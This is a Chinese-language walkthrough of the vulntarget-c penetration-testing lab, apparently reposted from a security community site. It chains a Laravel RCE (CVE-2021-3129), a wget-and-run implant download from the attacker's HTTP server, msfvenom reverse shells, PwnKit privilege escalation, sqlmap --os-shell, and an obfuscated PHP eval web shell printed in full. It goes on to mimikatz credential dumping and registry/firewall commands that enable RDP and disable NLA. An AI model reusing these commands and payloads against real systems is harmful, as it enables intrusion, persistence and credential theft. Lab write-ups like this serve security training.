vulntarget-c

guangen2025-08-18文章来源:SecHub网络安全社区

拓扑图

信息收集
DNS
收集dns记录、子域名、MX记录

端口信息测绘

ubuntu20
使用漏洞扫描工具fscan对外网进行漏洞扫描,显示存在cve-2021-3129漏洞

laravel RCE:cve-2021-3129
搜索公开POC漏洞利用方法

下载公开POC进行获取shell操作
poc地址:https://github.com/SNCKER/CVE-2021-3129
POC运行环境:https://github.com/ambionics/phpggc.git
将POC放到phpggc环境下运行

验证POC是否能够RCE命令执行,输入whoami,成功显示www-data用户

开启vshell生成反向马

攻击机开启http服务,目的使靶机下载执行木马进行上线vshell
python -m http.server 8888
复制http服务的链接:http://10.10.10.128:8888/tcp_linux_amd64

第一次执行没有上线,pwd当前目录在根目录,猜测权限不够,转移到tmp下进行上线
Exp(“http://10.10.10.130:80”, “cd /tmp&&wget http://10.10.10.128:8888/tcp_linux_amd64&&chmod +x tcp_linux_amd64&&./tcp_linux_amd64”)
出现此界面,证明成功上线

提权:CVE-2021-4034
上传linux-exploit-suggester.sh工具查看内核提权利用方法
Possible Exploits:

[+] [CVE-2022-2586] nft_object UAF

Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: probable
Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
查看完提权漏洞后转会话到msf,进行CVE漏洞利用,进行提权
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f elf > shell.elf #msf生成反向马
use exploit/multi/handler #开启监听
set lhost 10.10.10.128
set payload linux/x64/meterpreter/reverse_tcp
run
ubuntu20主机赋权运行,会话上线到msf

搜索CVE,set session 1会话进行run,成功拿到root权限

将root权限上线到vshell

win2016
查看当前网卡
10.10.10.130/24
10.0.20.141/24

上传fscan内网杀器进行扫描,没有扫到第二网段内容,开启msf的portscan模块扫描,20.100存活

开启socks5代理

配置proxifier全局代理

web后台弱密码
打开20.100

使用feroxbuster工具对其进行目录探测

探测到http://10.0.20.100/admin/login.php是一个web登录界面
尝试sqlmap自动化测试,不存在注入

进行弱密码爆破

admin/admin123登入后台
后台sql注入
打开X-ray工具对burpsuit转发流量进行漏洞检测
在后台修改文章处测出sql注入

使用–os-shell得到服务器权限

根据sqlmap路径找到上传点,直接传ts生成的免杀php马

<?php class G00KnK24 { public function __construct($Hj4HK){ @eval("/*Z#¥h*u@!h2248M4668*/".$Hj4HK."/*Z#¥h*u@!h2248M4668*/"); }}new G00KnK24($_REQUEST['shell']);?>

蚁剑连接

成功命令执行,并且是system权限

机器上线
杀软识别

因为win2016设置免杀处理,对cobalt strike生成的木马进行免杀

运行木马


vshell使用正向连接

成功上线windwos主机

使用mimikatz抓取密码

md5解码

mstsc远程连接
开启远程桌面
reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1
netsh advfirewall firewall add rule name=“Remote Desktop” protocol=TCP dir=in localport=3389 action=allow
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f

mstsc远程连接

发现机器存在远程连接软件mobileX
输入机器密码Admin#123进入软件,含有10.0.10.110机器,直接ssh连接,获取到命令行的普通用户权限

ubuntu20
sudo 提权
翻找连接工具,得到ssh普通用户密码

直接sudo su root成功拿到root权限